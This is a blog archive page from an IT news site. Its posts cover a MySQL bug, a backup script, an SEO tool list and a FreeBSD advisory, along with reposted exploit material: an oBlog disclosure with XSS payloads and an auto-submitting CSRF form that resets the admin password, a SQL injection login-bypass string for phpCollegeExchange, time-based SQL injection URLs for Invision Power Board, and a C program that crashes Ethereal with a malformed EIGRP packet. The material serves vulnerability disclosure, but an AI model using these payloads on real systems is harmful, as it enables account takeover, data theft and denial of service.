GO IT WORLD | IT TECH | IT NEWS

goitworld.com

Dec 17

Open_files_limit can’t be set larger than 2048 on Windows

Description:
Currently the number of fd’s on windows is limited to 2048.
This is bad for performance, for many reasons, mostly windows servers
are stuck with a tiny table_cache or low number of concurrent connections,
compared with linux running on the same hardware.

Error Log:
Could not increase number of max_open_files to more than 2048 (request: 3082)

Othre Error:

ERROR 1135: Can’t create a new thread (errno 11). If you are not out of available memory, you can consult the manual for a possible OS-dependent bug

How to repeat:
Run the server

mysqld-nt.exe –table_cache=1000 –max_connections=500 –open_files-limit=3000 –console

061122 17:04:27 [Warning] Could not increase number of max_open_files to more than 2048
(request: 2510)
061122 17:04:28 InnoDB: Started; log sequence number 0 43655
061122 17:04:28 [Note] mysqld-nt: ready for connections.
Version: ‘5.0.30-enterprise-gpl-nt’ socket: ” port: 3306 MySQL Enterprise Server
(GPL)

More:http://bugs.mysql.com/bug.php?id=24509

Solution:

1.Update Your Mysql Server to Mysql5.5,It has been fix is released in 5.5.

2.Replacement of the operating system,Linux have not the problem.

Tagged with: 2048 • bug • mysql • open_files_limit

Dec 16

oBlog Persistant XSS, CSRF, Admin Bruteforce

By jason Security Bulletin 1 Comment »

[-------------------------------------------------------------------------------------------------]
[   Application: oBlog                                                                            ]
[   Version: the only one there is                                                              ]
[   Download: http://www.dootzky.com/images/projects/oBlog.zip                                    ]
[   Author of this full disclosure: Milos Zivanovic                                               ]
[   Vulnerabilities: Persistant XSS, CSRF, Admin Bruteforce...                                    ]
[-------------------------------------------------------------------------------------------------]
Author of the application is contacted and author of this paper is not responsible for anything
you do after reading this text.
[#] Content:
|–Persistant XSS
| |
| |–Vulnerable function
| |–XSS in article comments
| |–XSS in add new article / Edit article, Naslov field (admin only)
| |–XSS in add new group (category) / Edit group, Naslov field (admin only)
| |–XSS in add link (blogroll) / Edit link, Ime prijatelja, Link fields (admin only)
| |–XSS in settings (admin only)
| |–NOTE!
|
|–Cross Site Request Forgery
| |
| |–Enable/Disable post
| |–Enable/Disable category
| |–Remove link
| |–Logout admin
| |–Change admin password
| |–Change admin settings (name, lastname, PASSWORD, blog title, blog slogan, text about author)
|     |–Exploit
|
|–Admin Bruteforce
|
|–Blog Spaming with empty/junk comments
|
|–Conclusion
[#] Full Disclosure:
-[================================================================================================]
-[+]Persistant XSS:
-[================================================================================================]
Function used in this application for filtering input against different types of attacks is not
written good and does not escape html characters.
Vulnerable code:
/oBlog/php/functions.php line 66-94 (function protectInput)
[code---------------------------------------------------------------------------------------------]
// protect invalind input
function protectInput($data, $type)
{
    if ($type == 'int') {
        if ((!is_numeric($data)) || ($data < 0)) $data = -1;
    }
    elseif ($type == 'double') {
        if ((!is_numeric($data)) || ($data < 0)) $data = -1;
    }
    elseif ($type == 'doubleLOOSE') {
        if (!is_numeric($data)) $data = -1; // jer cu nekada hteti da dozvolim i negativni broj, npr: ODBICI = -50 eura
    }
    elseif ($type == 'str') {
        // minimum length
        if (strlen($data) == 0) $data = '--';
        // add slashes if needed
        $data = (!get_magic_quotes_gpc()) ? addslashes ($data) : $data;
    }
    elseif ($type == 'date') {
        // otpakuj datum, i pripremi ga za ubacivanje u bazu (YYYY-MM-DD)
        $tmp = explode('.', $data);
        $data = $tmp[2] .'-'. $tmp[1] .'-'. $tmp[0];
    }
    else {
        die('wrong data type?! functions.php -> protectInput();');
    }
    return $data;
}
[code---------------------------------------------------------------------------------------------]
As we can see there's no function that deals with escaping html characters thus enableing us to
insert malicious javascript code.
[-]XSS in article comments:
http://localhost/oBlog/article.php?aid=[ARTICLE ID]
When adding comment to blog post, we can insert javascript code into certain fields and it will not
be filtered, and pure javascript code will show one the page. Vulnerable fields: Ime, Komentar
/oBlog/article.php line 44-49 (function saveNewComment)
[code---------------------------------------------------------------------------------------------]
// get data
    $commentName    = protectInput($_POST['commentName'], 'str');
    $commentEmail   = protectInput($_POST['commentEmail'], 'str');
    $commentWeb     = protectInput($_POST['commentWeb'], 'str');
    $commentText    = protectInput($_POST['commentText'], 'str');
[code---------------------------------------------------------------------------------------------]
I've used this javascript just to test vulnerability:
[POC----------------------------------------------------------------------------------------------]
<script>alert(1)</script>
[POC----------------------------------------------------------------------------------------------]
[-]XSS in add new article / Edit article, Naslov field (admin only):
Add: http://localhost/oBlog/admin/write.php?new=entry
Edit: http://localhost/oBlog/admin/write.php?edit=[ARTICLE ID]
When creating new post (or edit) in admin panel, person can inject malicious javascript code into
field: Naslov and it will not be filtered, as it is using same protectInput function.
/oBlog/admin/write.php line 136-138 (function saveChanges)
[code---------------------------------------------------------------------------------------------]
// get data
    $article_id     = protectInput($_POST['article_id'], 'int');
    $title          = protectInput($_POST['title'], 'str');
[code---------------------------------------------------------------------------------------------]
The title of the post is showed in main page of the blog, as in the main page of the admin panel
so this could be used for hidden and more important dangerous permanent javascript.I've used this
javascript just to test vulnerability:
[POC----------------------------------------------------------------------------------------------]
<script>alert(1)</script>
[POC----------------------------------------------------------------------------------------------]
[-]XSS in add new group (category) / Edit group, Naslov field (admin only):
Add: http://localhost/oBlog/admin/groups.php?new=entry
Edit: http://localhost/oBlog/admin/groups.php?edit=[ARTICLE ID]
When creating new group or category(or editing), we can insert malicious javascript code into
field: Ime Grupe and it will not be filtered, this script also uses protectInput function.
/oBlog/admin/groups.php line 79-81 (function saveChanges)
[code---------------------------------------------------------------------------------------------]
// get data
    $category_id    = protectInput($_POST['category_id'], 'int');
    $category_name = protectInput($_POST['category_name'], 'str');
[code---------------------------------------------------------------------------------------------]
Title of groups is showed in main page of the blog and in the Groups page in the admin panel.
I've used this javascript just to test vulnerability:
[POC----------------------------------------------------------------------------------------------]
<script>alert(1)</script>
[POC----------------------------------------------------------------------------------------------]
[-]XSS in add link (blogroll) / Edit link, Ime prijatelja, Link fields (admin only):
Add: http://localhost/oBlog/admin/blogroll.php?new=entry
Edit: http://localhost/oBlog/admin/blogroll.php?edit=[BLOGROLL ID]
When adding new link (or editing) we can insert malicious javascript code into fields: Ime
Prijatelja and Link. Field Ime Prijatelja is showed in the main page of the blog and in the
blogroll.php page of the admin panel, and field Link is exploitable only in admin panel
(blogpoll.php).
/oBlog/admin/blogroll.php line 67-69 (function saveChanges)
[code---------------------------------------------------------------------------------------------]
// get data
    $blogroll_id    = protectInput($_POST['blogroll_id'], 'int');
    $tile           = protectInput($_POST['title'], 'str');
[code---------------------------------------------------------------------------------------------]
I've used this javascript just to test vulnerability:
[POC----------------------------------------------------------------------------------------------]
<script>alert(1)</script>
[POC----------------------------------------------------------------------------------------------]
[-]XSS in settings (admin only):
http://localhost/oBlog/admin/settings.php
There we can edit fields Ime bloga and Moj slogan and put javascript which will be printed in every
page of our blog (not admin panel) and that is certainly not good.
/oBlog/admin/settings.php line 20-22
[code---------------------------------------------------------------------------------------------]
// settings
    $data['blog_name']     = protectInput($_POST['blog_name'], 'str');
    $data['tag_line']      = protectInput($_POST['tag_line'], 'str');
[code---------------------------------------------------------------------------------------------]
I've used this javascript just to test vulnerability:
[POC----------------------------------------------------------------------------------------------]
<script>alert(1)</script>
[POC----------------------------------------------------------------------------------------------]
[-]NOTE!
I didn't think about this at the begining of the search for the exploits mission, but i've just
realised that all of the 'admin only' XSS's i found can be injected via CSRF method.
-[================================================================================================]
-[+]Cross Site Request Forgery:
-[================================================================================================]
Author of this blogging system is not introduced with csrf vulnerability, so there were no tokens
or other security mesures used to secure this application against this type of attack.
[-]Enable/Disable post:
We can inject this link below into some <iframe> and with admin visiting the link it will disable
showing of certain article (depending on article id)
[POC---DISABLE------------------------------------------------------------------------------------]
http://localhost/oBlog/admin/write.php?publish=[ARTICLE ID]&action=0
[POC----------------------------------------------------------------------------------------------]
[POC---ENABLE-------------------------------------------------------------------------------------]
http://localhost/oBlog/admin/write.php?publish=[ARTICLE ID]&action=1
[POC----------------------------------------------------------------------------------------------]
[-]Enable/Disable category:
Another disable csrf. With this by opening this one admin will secretly disable showing all posts
from certain category (depending on category id)
[POC----DISABLE-----------------------------------------------------------------------------------]
http://localhost/oBlog/admin/groups.php?visible=[CATEGORY ID]&action=0
[POC----------------------------------------------------------------------------------------------]
[POC----ENABLE------------------------------------------------------------------------------------]
http://localhost/oBlog/admin/groups.php?visible=[CATEGORY ID]&action=1
[POC----------------------------------------------------------------------------------------------]
[-]Remove link:
With this csrf we can remove any or all links from the blogging system:
[POC----------------------------------------------------------------------------------------------]
http://localhost/oBlog/admin/blogroll.php?delete=[LINK ID]
[POC----------------------------------------------------------------------------------------------]
[-]Logout admin:
With this csrf we can logout admin without his knowledge:
[POC----------------------------------------------------------------------------------------------]
http://localhost/oBlog/admin/write.php?logout=user
[POC----------------------------------------------------------------------------------------------]
[*]Change admin password:
This is one of the most critical vulnerabilities i found in this application. Since there is no
CSRF protection, we can change admin's password. Here's the sweet data we need to send via POST
method for this to work:
[INFO---------------------------------------------------------------------------------------------]
submit = 1 // set it to any value, just set it
password1 = "hacked"
password2 = "hacked"
[INFO---------------------------------------------------------------------------------------------]
And send it to /oBlog/admin/settings.php script via POST method. That will change password for the
admin with default username 'admin' (you can't change that in admin panel or anywhere else).
[*]Change admin settings (name, lastname, PASSWORD, blog title, blog slogan, text about author)
[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/oBlog/admin/settings.php" method="POST">
<input type="text" name="name" value="exploit">
<input type="text" name="surname" value="for oBlog">
<input type="text" name="nice_name" value="exploit for oBlog">
<input type="text" name="blog_name" value="Exploited blog">
<input type="text" name="tag_line" value="Free your mind and the ass will follow">
<input type="password1" name="password1" value="hacked">
<input type="password2" name="password2" value="hacked">
<select name="posts_per_page">
    <option label="15" value="15" selected="selected">15</option>
</select>
<select name="theme">
    <option value="pedja" selected>pedja</option>
</select>
<textarea name="about">I have been hacked</textarea>
<input type="submit" value="Snimi promene" name="submit" id="submitButton">
</form>
<script>document.forms[0].submit.click();</script>
[EXPLOIT------------------------------------------------------------------------------------------]
We can edit the fields and put the desired stuff in them. Since i've showed that some other parts
of the oBlog blogging system are vulnerable to persistant xss, we could use this to insert hidden
<iframe> with malicious content in the name of the blog. If you don't want to edit admin's password
remove value="hacked" from 2 lines above you find this in.
-[================================================================================================]
-[+]Admin Bruteforce
-[================================================================================================]
On the admin panel login script /oBlog/admin/index.php there is no security mesure against
bruteforce. A program could be made that would bruteforce the script and, depending on password
complexity, sooner or later, find the login info. Captcha system would come in handy to fix this
vulnerability.
-[================================================================================================]
-[+]Blog Spaming with empty/junk comments
-[================================================================================================]
When adding comments to posts there is no security mesure against bots (no captcha) and on top of
that script doesn't test the input if it's empty, using function protectInput from functions.php
that i posted in the begining of this text it only converts empty fields into '--'. So we can use
one link to generate junk comments.
[POC----------------------------------------------------------------------------------------------]
http://localhost/oBlog/article.php?aid=[ARTICLE ID]&comment=new
[POC----------------------------------------------------------------------------------------------]
-[================================================================================================]
-[+]Conclusion
-[================================================================================================]
oBlog web application is very small (less then 3 mb) and simple. Even tho it's small and simple
it is full of security holes, and as we all know security is something that should come in first
place and it should be our main goal to achive when coding web applications.
[-------------------------------------------------------------------------------------------------]
[                                              EOF                                                ]
[-------------------------------------------------------------------------------------------------]

Tagged with: bruteforce • csrf • oblog • persistant xss

Dec 13

phpCollegeExchange 0.1.5c Multiple SQL Injection Vulnerabilities

By jason Security Bulletin 6 Comments »

Name phpCollegeExchange
Vendor http://phpcollegeex.sourceforge.net
Versions Affected 0.1.5c

Author            Salvatore Fresta aka Drosophila
Website           http://www.salvatorefresta.net
Contact           salvatorefresta [at] gmail [dot] com
Date              2009-12-11

X. INDEX

I.    ABOUT THE APPLICATION
II.   DESCRIPTION
III. ANALYSIS
IV.   SAMPLE CODE
V.    FIX
VI.   DISCLOSURE TIMELINE

I. ABOUT THE APPLICATION

PhpCollegeExchange is a full fledged college community
website.

II. DESCRIPTION

This application is affected by many SQL Injection
security flaws. In order to exploit they, the Magic Quotes
GPG (php.ini) must be Off.
In this security advisory I reported only some of the
vulnerable files.
I tested 0.1.5c version only, however other versions may
be also vulnerable.

III. ANALYSIS

Summary:

A) Authentication Bypass
B) Multiple SQL Injection

A) Authentication Bypass

Using a SQL Injection in the login process, a guest can
bypass the authentication.
In order to exploit it, The Magic Quotes GPG flag must be
Off.

Vulnerable code (functions.php):

……..

function checkpass($handle,$pass){
require_once($home."mysqlinfo.php");
include("i_aeskey.php");
$query="SELECT AES_DECRYPT(password,’$AES_key’) FROM users WHERE
(handle=’$handle’)";
$result = mysql_query($query);

if(mysql_num_rows($result))
{
    if($r = mysql_fetch_array($result))
     {$dbpass=$r[0];}
     if($pass==$dbpass)
        {return 1;}

……..

B) Multiple SQL Injection

Searchend.php is affected by multiple SQL injection issues
that allow a guest to view reserved information stored
into the database.
The following is an example of vulnerable code found in
searchend.php.

Vulnerable code (searchend.php):

……..

$query = "SELECT * FROM Books";

if(isset($_POST['searchby'])){$searchby=$_POST['searchby'];}else{$searchby=$_GET['searchby'];}

switch($searchby){
……..

case "Title" :

$title = $_POST['searchquery'];
if(strlen($title)>2){
//check length at least 3 chars

$query .= " WHERE (title LIKE ‘%$title%’) ORDER BY price";
$result = mysql_query($query);

……..

Another funny SQL injection may be seen in forgotpass.php.
It can be manipulate to send to an arbitrary email address
the password of a registered user, knowing the AES key.

Vulnerable code:

……..

if( isset($_POST["handle"]) ){

……..

$query="SELECT AES_DECRYPT(password,’$AES_key’), email FROM users
WHERE (handle=’$handle’)";
$result = mysql_query($query);

if(mysql_num_rows($result)){

$r = mysql_fetch_array($result);

$email = $r[1];
$pass = $r[0];

……..

mail("$email", "Your Book Exchange Password", $emailcontent);

……..

IV. SAMPLE CODE

A) Authentication Bypass

Username: -1′) UNION ALL SELECT ‘foo’#
Password: foo

B) Multiple SQL Injection

A proof of concept can be found here:
http://poc.salvatorefresta.net/PoC-phpCollegeExchange.txt

V. FIX

No fix.

VIII. DISCLOSURE TIMELINE

2009-12-11 Bug discovered
2009-12-11 Initial vendor contact
2009-12-11 Advisory Release

Tagged with: phpcollegeexchange • sql injection • Vulnerabilities

Dec 07

Ethereal EIGRP Dissector TLV_IP_INT Long IP Remote DoS Exploit

By jason Security Tools 4 Comments »

/*
* Ethereal network protocol analyzer
* EIGRP Dissector TLV_IP_INT Long IP Address Overflow
* vulnerability
* proof of concept code
* version 1.0 (Mar 26 2004)
*
* by R�mi Denis-Courmont < ethereal at simphalampin dot com >
*   www simphalempin com dev
*
* This vulnerability was found by:
*   Stefan Esser s.esser e-matters de
* whose original advisory may be fetched from:
*   security e-matters de advisories 032004.html
*
* Vulnerable:
* – Ethereal v0.10.2
*
* Not vulnerable:
* – Ethreal v0.10.3
*
* Note: this code will simply trigger a denial of service on Ethereal.
* It should really be possible to exploit the buffer overflow
* (apparently up to 29 bytes overflow), but I haven’t tried.
*/
#include <string.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netdb.h>
static const char packet[] =
        "x01" /* Version */
        "x04" /* Opcode: Reply */
        "x00×00" /* Checksum (invalid) */
        "x00×00x00×00" /* Flags */
        "x00×00x00×00" /* Sequence number */
        "x00×00x00×00" /* ACK */
        "x00×00x00×00" /* AS number */
        /* IP internal routes TLV */
        "x01×02" /* Type */
        "x00×39" /* Length (should be 0×1C) */
        "x00×00x00×00" /* Next hop */
        "x00×00x00×00" /* Delay */
        "x00×00x00×00" /* Bandwitdh */
        "x00×00x00" /* MTU */
        "x00" /* Hop count: directly connected */
        "xff" /* Reliability: maximum */
        "x01" /* Load: minimum */
        "x00×00" /* Reserved */
        "xff" /* Prefix length: should be > 0 and <= 32 */
        "x00×00x00" /* Destination network */
        "xffxffxffxff" "xffxffxffxff"
        "xffxffxffxff" "xffxffxffxff"
        "xffxffxffxff" "xffxffxffxff"
        "xffxffxffxff" "xff" /* buffer overflow */
;
static int
proof (const struct sockaddr_in *dest)
{
        int fd;
        size_t len;
        fd = socket (PF_INET, SOCK_RAW, 88);
        if (fd == -1)
        {
                perror ("Raw socket error");
                return 1;
        }
        len = sizeof (packet) – 1;
        if (sendto (fd, packet, len, 0, (const struct sockaddr *)dest,
                        sizeof (struct sockaddr_in)) != len)
        {
                perror ("Packet sending error");
                close (fd);
                return 1;
        }
        puts ("Packet sent!");
        close (fd);
        return 0;
}
static int
usage (const char *path)
{
        fprintf (stderr, "Usage: %s <hostname/IP>n", path);
        return 2;
}
int
main (int argc, char *argv[])
{
        struct sockaddr *dest;
        puts ("Ethereal EIGRP Dissector TLV_IP_INT Long IP Address Overflown"
                "proof of concept coden"
                "Copyright (C) 2004 R<E9>mi Denis-Courmont "
                "<x65×74x68×65x72×65x61×6cx40×73x69×6dx70"
                "x68×61x6cx65×6dx70×69x6ex2ex63×6fx6d>n");
        if (argc != 2)
                return usage (argv[0]);
        else
        {
                struct addrinfo help, *res;
                int check;
                memset (&help, 0, sizeof (help));
                help.ai_family = PF_INET;
                check = getaddrinfo (argv[1], NULL, &help, &res);
                if (check)
                {
                        fprintf (stderr, "%s: %sn", argv[1],
                                        gai_strerror (check));
                        return 1;
                }
                dest = res->ai_addr;
        }
        return proof ((const struct sockaddr_in *)dest);
}

Tagged with: dissector • eigrp • ethereal • long ip • remote dos exploit

Dec 06

Invision Power Board SQL Injection Vulnerabilities

By jason Security Bulletin 4 Comments »

Version:

Invision Power Services Invision Power Board 2.3.6
Invision Power Services Invision Power Board 3.0.4

Description:

The attacker can exploit the SQL-injection vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Test

http://www.example.com/?app=forums&module=moderate&section=moderate&f=1&do=prune_move&df=3&pergo=50&dateline=0&state=open&ignore_pin=1&max=0&s
tarter=1%20AND%20starter_id=1%20OR%20substr(version(),1,1)=5%20AND%20sleep(15)%20–%20skip%20&auth_key=c4276b77602767228faa9760eb4a5abd

http://www.example.com/forum/?act=mod&f=1&CODE=prune_move&df=3&pergo=50&dateline=0&state=open&ignore_pin=1&max=0&starter=1%20AND%20starter_id=1%20OR
%20substr(version(),1,1)=5%20AND%20sleep(16)%20–%20skip%20&auth_key=040c4a6e768d626b4c05a4bb0fbf315c

Tagged with: invision • power board • sql injection • Vulnerabilities

Dec 05

FreeBSD Security Advisories (security-advisories freebsd org)

By jason Security Bulletin No Comments »

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA1
========================================================================
=====
FreeBSD-SA-09:17.freebsd-update Security Advisory
The FreeBSD Project
Topic: Inappropriate directory permissions in freebsd-update(8)
Category: core
Module: usr.sbin
Announced: 2009-12-03
Credits: KAMADA Ken’ichi
Affects: All supported versions of FreeBSD.
Corrected: 2009-12-03 09:18:40 UTC (RELENG_8, 8.0-STABLE)
2009-12-03 09:18:40 UTC (RELENG_8_0, 8.0-RELEASE-p1)
2009-12-03 09:18:40 UTC (RELENG_7, 7.2-STABLE)
2009-12-03 09:18:40 UTC (RELENG_7_2, 7.2-RELEASE-p5)
2009-12-03 09:18:40 UTC (RELENG_7_1, 7.1-RELEASE-p9)
2009-12-03 09:18:40 UTC (RELENG_6, 6.4-STABLE)
2009-12-03 09:18:40 UTC (RELENG_6_4, 6.4-RELEASE-p8)
2009-12-03 09:18:40 UTC (RELENG_6_3, 6.3-RELEASE-p14)
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:http://security.FreeBSD.org/>.
I. Background
The freebsd-update(8) utility is used to fetch, install, and rollback
updates to the FreeBSD base system, and also to upgrade from one FreeBSD
release to another.
II. Problem Description
When downloading updates to FreeBSD via ‘freebsd-update fetch’ or
‘freebsd-update upgrade’, the freebsd-update(8) utility copies currently
installed files into its working directory (/var/db/freebsd-update by
default) both for the purpose of merging changes to configuration files
and in order to be able to roll back installed updates.
The default working directory used by freebsd-update(8) is normally
created during the installation of FreeBSD with permissions which allow
all local users to see its contents, and freebsd-update(8) does not take
any steps to restrict access to files stored in said directory.
III. Impact
A local user can read files which have been updated by freebsd-update(8),
even if those files have permissions which would normally not allow users
to read them. In particular, on systems which have been upgraded using
‘freebsd-update upgrade’, local users can read freebsd-update’s backed-up
copy of the master password file.
IV. Workaround
Set the permissions on the freebsd-update(8) working directory to not
allow unprivileged users to read said directory:
# chmod 0700 /var/db/freebsd-update
Note that if freebsd-update(8) is run using the ‘-d workdir’ option, the
directory which should have its permissions adjusted will be different.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to 6-STABLE, 7-STABLE or 8-STABLE,
or to the RELENG_8_0, RELENG_7_2, RELENG_7_1, RELENG_6_4, or
RELENG_6_3 security branch dated after the correction date.
2) To patch your present system:
The following patch has been verified to apply to FreeBSD 6.3, 6.4,
7.1, 7.2, and 8.0 systems.
a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.
# fetch http://security.FreeBSD.org/patches/SA-09:17/freebsd-update.patch
# fetch http://security.FreeBSD.org/patches/SA-09:17/freebsd-update.patch.asc
b) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/usr.sbin/freebsd-update
# make obj && make depend && make && make install
# chmod 0700 /var/db/freebsd-update
VI. Correction details
The following list contains the revision numbers of each file that was
corrected in FreeBSD.
CVS:
Branch Revision
Path
- ————————————————————————
-
RELENG_6
src/usr.sbin/freebsd-update/freebsd-update.sh 1.2.2.11
src/etc/mtree/BSD.var.dist 1.71.2.4
RELENG_6_4
src/UPDATING 1.416.2.40.2.12
src/sys/conf/newvers.sh 1.69.2.18.2.14
src/usr.sbin/freebsd-update/freebsd-update.sh 1.2.2.10.2.2
src/etc/mtree/BSD.var.dist 1.71.2.3.6.2
RELENG_6_3
src/UPDATING 1.416.2.37.2.19
src/sys/conf/newvers.sh 1.69.2.15.2.18
src/usr.sbin/freebsd-update/freebsd-update.sh 1.2.2.8.2.1
src/etc/mtree/BSD.var.dist 1.71.2.3.4.1
RELENG_7
src/usr.sbin/freebsd-update/freebsd-update.sh 1.8.2.5
src/etc/mtree/BSD.var.dist 1.75.2.1
RELENG_7_2
src/UPDATING 1.507.2.23.2.8
src/sys/conf/newvers.sh 1.72.2.11.2.9
src/usr.sbin/freebsd-update/freebsd-update.sh 1.8.2.4.4.2
src/etc/mtree/BSD.var.dist 1.75.8.2
RELENG_7_1
src/UPDATING 1.507.2.13.2.12
src/sys/conf/newvers.sh 1.72.2.9.2.13
src/usr.sbin/freebsd-update/freebsd-update.sh 1.8.2.4.2.2
src/etc/mtree/BSD.var.dist 1.75.6.2
RELENG_8
src/usr.sbin/freebsd-update/freebsd-update.sh 1.16.2.3
src/etc/mtree/BSD.var.dist 1.75.10.2
RELENG_8_0
src/UPDATING 1.632.2.7.2.4
src/sys/conf/newvers.sh 1.83.2.6.2.4
src/usr.sbin/freebsd-update/freebsd-update.sh 1.16.2.2.2.2
src/etc/mtree/BSD.var.dist 1.75.10.1.2.2
- ————————————————————————
-
Subversion:
Branch/path Revision
- ————————————————————————
-
stable/6/ r200054
releng/6.4/ r200054
releng/6.3/ r200054
stable/7/ r200054
releng/7.2/ r200054
releng/7.1/ r200054
stable/8/ r200054
releng/8.0/ r200054
- ————————————————————————
-
VII. References
The latest revision of this advisory is available at
http://security.FreeBSD.org/advisories/FreeBSD-SA-09:17.freebsd-update.a
sc
—–BEGIN PGP SIGNATURE—–
Version: GnuPG v1.4.10 (FreeBSD)
iEYEARECAAYFAksXhA0ACgkQFdaIBMps37Lg+wCfSK5sMXpsxTW9jpgwwcqx+24z
zzwAniR50V8K8/vI0qshCUaKwryEYDuK
=/lsC
—–END PGP SIGNATURE—–

Tagged with: advisories • freebsd • security

Dec 03

Top 16 Seo tools

By jason SEO World 3 Comments »

Google AdSense Charts
Generate all sorts of nifty charts with your AdSense CSV data export (requires a Google AdSense account of course).

Google AdSense Sandbox
This tool will show you what Google AdSense ads will be displayed for any webpage on the Internet.

Back Link Tracking Tool
Track backlink fluctuations to your web pages historically.

Coop Ad Network
Free network of site owners to share advertising space.

Diff Comparison
Tool to show you the difference between two pieces of text.

DNS Zone Transfer
Handy little utility to quickly pull your DNS zone files from your name servers.

FileMaker Pro Web Digger
This utility allows you to dig into your web-based FileMaker Pro databases to check their security.

FileMaker Database Server Probe
This utility allows you to check your FileMaker database server to see what platform it’s running as well as what database files are being served.

Keyword Ranking Monitor
Track historical search engine result placement data for any keyword/URL combo you choose.

Keyword Suggestion Tool
Quickly see which phrases are searched upon the most (for determining the best phrases to target for your website).

PageRank Toolbar For Mac
A widget to show PageRank for the site you are on.

Add Search Functionality To Your Website
An easy way that you can add search functionality to any website.

Free Web Counter
Free tool that gives any website a free hit counter for their site.

Website To Country
Find the physical country that any website is in.

Geo Visitors
Show the physical location of the visitors to your website/blog.

Yahoo! Web Rank Tool
This tool will show you what any website’s Yahoo! Web Rank is (without needing the Yahoo toolbar).

Tagged with: seo • tools

Dec 02

Mysql Full Backup Script

By jason Mysql Server 1 Comment »

Mysql Full Backup Script, Hope it can help you.

#!/bin/sh
###################################################################
# Name:Mysql_Full_Backup.sh
# PS:MySQL DataBase Full Backup.
# Write by:Jason
# Last Modify:2009-11-20
###################################################################

# Define Variable Please Modify By Fact
# Define Script Directory
scriptsDir=/home/Script

# Define Database Directory
mysqlDir=/srv/mysql

# Define Database User & Name
user=bkuser
userPWD=pwd

# Define Backup Directory
dataBackupDir=/home/mysqlbackup

# Define Email Content
eMailFile=$dataBackupDir/email.txt

# Define Email Address
eMail=xxxx@mail.com

# Define Backup Log File.
logFile=$dataBackupDir/mysqlbackup.log
DATE=`date -I`

echo "" > $eMailFile
echo $(date +"%y-%m-%d %H:%M:%S") >> $eMailFile
cd $dataBackupDir

# Define Backup Filename.
dumpFile=database_$DATE.sql
GZDumpFile=database_$DATE.sql.tar.gz

# Backup Database By mysqldump
$mysqlDir/bin/mysqldump -u$user -p$userPWD \
–opt –default-character-set=gbk –extended-insert=false \
–triggers -R –hex-blob –all-databases \
–flush-logs –delete-master-logs \
–lock-all-tables > $dumpFile

# Compress Backup File

if [[ $? == 0 ]]; then
tar czf $GZDumpFile $dumpFile >> $eMailFile 2>&1
echo "BackupFileName:$GZDumpFile" >> $eMailFile
echo "DataBase Backup Success!" >> $eMailFile

rm -f $dumpFile

# Delete daily backup files.
# cd $dataBackupDir/daily
# rm -f *

# Delete old backup files(mtime>2).
# $scriptsDir/rmBackup.sh

# Move Backup Files To Backup Server.
$scriptsDir/Rsync_Backup.sh

if (( !$? )); then
    echo "Move Backup Files To Backup Server Success!" >> $eMailFile
    else
    echo "Move Backup Files To Backup Server Fail!" >> $eMailFile
fi
else
echo "DataBase Backup Fail!" >> $emailFile
fi

# Write Log File…
#echo "——————————————————–" >> $logFile

cat $eMailFile >> $logFile

# Notify ADMIN by Email.
#cat $eMailFile | mail -s "MySQL Backup" $eMail

Tagged with: backup • mysql • script

GO IT WORLD | IT TECH | IT NEWS

Open_files_limit can’t be set larger than 2048 on Windows

oBlog Persistant XSS, CSRF, Admin Bruteforce

phpCollegeExchange 0.1.5c Multiple SQL Injection Vulnerabilities

Ethereal EIGRP Dissector TLV_IP_INT Long IP Remote DoS Exploit

Invision Power Board SQL Injection Vulnerabilities

FreeBSD Security Advisories (security-advisories freebsd org)

Top 16 Seo tools

Mysql Full Backup Script

Text Ads

Categories

Tag Cloud

Archives

Links

Meta